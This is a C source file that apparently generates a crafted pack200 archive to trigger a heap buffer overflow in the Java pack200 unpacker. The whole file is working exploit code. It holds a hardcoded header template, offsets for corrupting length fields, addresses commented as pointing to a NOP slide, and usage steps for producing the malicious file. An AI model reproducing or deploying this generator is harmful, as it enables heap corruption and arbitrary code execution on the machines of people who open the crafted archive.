/*
 * pack200 trigger generator
 * 0day.service@gmail.com
 *
 * Example usage:
 *  $ ./gen 0xf90 0xff0 > e.pack
 *  $ gzip e.pack
 *
 *  This will generate pack200 file which overwrites 0xf90 bytes long
 *  buffer from FreeList[0]. The second value is overwrite range.
 *  0x60 bytes will be written beyond the buffer.
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

#define MAX_i 5
#define lg_H 6
#define L (256-(1 << lg_H))
#define H (1 << lg_H)

//pack200 header template data file
char pack200[] = 
"\xca\xfe\xd0\x0d\x07\x96\xf6\x00\x00\x53\x00\xc2\xdb\xd8\xcc\x46\x03"
"\x2c\x00\x00\x44\x00\x03\x0e\x0c\x13\x05\x0d\x47\x49\x00\x31\x43\x04"
"\x01\x00\x06\x01\x03\x01\x02\x01\x00\x00\x12\x11\x00\x00\x00\x0a\x09"
"\x02\x00\x00\x01\x18\x07\x00\x00\x05\x0a\x0c\x09\x0b\x12\x0e\x02\x2b"
"\x00\x06\x05\x00\x0a\x09\x00\x04\x01\x04\x05\x01\x04\x05\x08\x05\x01"
"\x02\x09\x0b\x04\x06\x05\x08\x04\x02\x01\x01\x01\x0c\x0c\x0b\x0c\x0b"
"\x0b\x06\x07\x05\x18\x07\x07\x08\x04\x09\x08\x03\x0f\x02\x08\x06\x28"
"\x29\x4c\x3b\x56\x4a\x29\x4c\x3b\x4c\x3b\x29\x4c\x3b\x56\x4c\x3b\x29"
"\x56\x5b\x4c\x3b\x29\x56\x3c\x63\x6c\x69\x6e\x69\x74\x3e\x69\x6e\x69"
"\x74\x3e\x4a\x4c\x3b\x4d\x45\x54\x41\x2d\x49\x4e\x46\x2f\x4d\x41\x4e"
"\x49\x46\x45\x53\x54\x2e\x4d\x46\x54\x65\x73\x74\x61\x70\x70\x65\x6e"
"\x64\x63\x6c\x6f\x73\x65\x65\x78\x70\x6c\x2e\x6a\x61\x72\x70\x61\x63"
"\x6b\x69\x31\x32\x33\x34\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x46\x69\x6c"
"\x65\x4f\x75\x74\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x49\x4f\x45\x78"
"\x63\x65\x70\x74\x69\x6f\x6e\x4f\x75\x74\x70\x75\x74\x53\x74\x72\x65"
"\x61\x6d\x50\x72\x69\x6e\x74\x53\x74\x72\x65\x61\x6d\x6c\x61\x6e\x67"
"\x2f\x4f\x62\x6a\x65\x63\x74\x53\x74\x72\x69\x6e\x67\x42\x75\x69\x6c"
"\x64\x65\x72\x79\x73\x74\x65\x6d\x75\x74\x69\x6c\x2f\x6a\x61\x72\x2f"
"\x4a\x61\x72\x4f\x75\x74\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x50\x61"
"\x63\x6b\x32\x30\x30\x24\x50\x61\x63\x6b\x65\x72\x55\x6e\x70\x61\x63"
"\x6b\x65\x72\x6d\x61\x69\x6e\x6e\x65\x77\x50\x61\x63\x6b\x65\x72\x55"
"\x6e\x70\x61\x63\x6b\x65\x72\x6f\x75\x74\x70\x72\x69\x6e\x74\x53\x74"
"\x61\x63\x6b\x54\x72\x61\x63\x65\x6c\x6e\x74\x6f\x53\x74\x72\x69\x6e"
"\x67\x75\x6e\x70\x61\x63\x6b";


#define ARCHIVE_SIZE_OFFSET 0x9
#define DOUBLE_TAG_OFFSET 0x14
#define IC_COUNT_OFFSET 0x1d
#define CLASS_COUNT_OFFSET 0x20

//points to nopslide
#define HI_DWORD	0x25a000c0
#define LO_DWORD	0x25a00040


char str[16];
char bigbuf[1000000];

// encode value into PACK200 UNSIGNED_5
char *un5(unsigned int sum, char **buf)
{
  unsigned int i;
  unsigned int b_i;
  char *temp=str;
  
  for (i = 1; ; ) {
    if (sum < L || i == MAX_i) {
       sprintf(temp, "%x", sum);
       **buf = (char)sum;
       (*buf)++; 
       break;
    }
    sum -= L;
    b_i = L + (sum % H);  // this is a "high code"
    sum >>= lg_H;             // extracted 6 bits
    temp+=sprintf(temp, "%x ",b_i); 
    **buf = (char)b_i;
    (*buf)++;
    ++i;
  }
  return str;
}

#define LENGTH(x)	(x-(pack200p-pack200))

int main(int argc, char **argv)
{
  unsigned int size, payload, tag_count, class_count, archive_size;
  char *tmp, *bigbufp, *pack200p;
  int ic_count,r;
  
  if(argc < 3)
  {
    fprintf(stderr, "Usage: ./calc <buffer_size> <payload_size>\n\n");
    return -1;
  }  

  size = strtol(argv[1], &tmp, 0);
  payload = strtol(argv[2], &tmp, 0);
  
  if(size % 24 != 0)
    fprintf(stderr, "Warning: buffer size modulo 24 != 0. Buffer size will be: %d (0x%x)\n", (size/24)*24, (size/24)*24);

  if(payload % 24 != 0)
    fprintf(stderr, "Warning: payload size modulo 24 != 0. Payload size will be: %d (0x%x)\n", (payload/24)*24, (payload/24)*24);

  if(payload <= size)
  {
    fprintf(stderr, "Error: payload has to be greater than buffer to overflow!\n");
    return 0;
  }
  
  tag_count = 44+14+3+5+13+71+19+12; //hardcoded in pack200 template data
  
  size /= 24;
  payload /= 24;
  
  
  class_count=1;
  ic_count = (size - 40 - class_count - tag_count - payload);
  r=ic_count % 3;
  ic_count /= 3;

  if(r != 0)
  {
    if(r < 0){
      r=-r;
      ic_count--;
    }
    class_count += (3-r);
  }
  

  archive_size = sizeof(pack200) + payload*2 + 6027;
  
  // generate payload
  
  bigbufp = bigbuf;
  pack200p = pack200;
  
  memcpy(bigbufp, pack200p, ARCHIVE_SIZE_OFFSET);
  pack200p += ARCHIVE_SIZE_OFFSET+1;
  bigbufp += ARCHIVE_SIZE_OFFSET;
  
 //encode archive_size
  fprintf(stderr, "archive_size = %d (%s)\n", archive_size, un5(archive_size, &bigbufp));
   
  memcpy(bigbufp, pack200p, LENGTH(DOUBLE_TAG_OFFSET));
  bigbufp += LENGTH(DOUBLE_TAG_OFFSET);
  pack200p += LENGTH(DOUBLE_TAG_OFFSET)+1;
  
  //encode double tag len
  fprintf(stderr,"double tag len = %d (%s)\n", payload, un5(payload, &bigbufp));
  
  memcpy(bigbufp, pack200p, LENGTH(IC_COUNT_OFFSET));
  bigbufp += LENGTH(IC_COUNT_OFFSET);
  pack200p += LENGTH(IC_COUNT_OFFSET)+1;
  
  //encode ic_count
  fprintf(stderr,"ic_count = %d (%s)\n", ic_count, un5(ic_count, &bigbufp));
  
  memcpy(bigbufp, pack200p, LENGTH(CLASS_COUNT_OFFSET));
  bigbufp += LENGTH(CLASS_COUNT_OFFSET);
  pack200p += LENGTH(CLASS_COUNT_OFFSET)+1;
  
  //encode double tag len
  fprintf(stderr,"class_count = %d (%s)\n", class_count, un5(class_count, &bigbufp));
  
  memcpy(bigbufp, pack200p, LENGTH(sizeof(pack200)-1));
  bigbufp += LENGTH(sizeof(pack200)-1); // minus trailing NULL
  
  //encode cp_band_hi
  un5(HI_DWORD, &bigbufp);
  bigbufp += payload-1;
  
  //encode cp_band_lo
  un5((LO_DWORD << 1), &bigbufp);
  bigbufp += payload-1;
  
  //rest of the buffer will be filled with 0x22
  memset(bigbufp, 0x22, archive_size-(bigbufp-bigbuf));
  
  
  //print out payload
  write(1, bigbuf, archive_size);
  return 0;
}
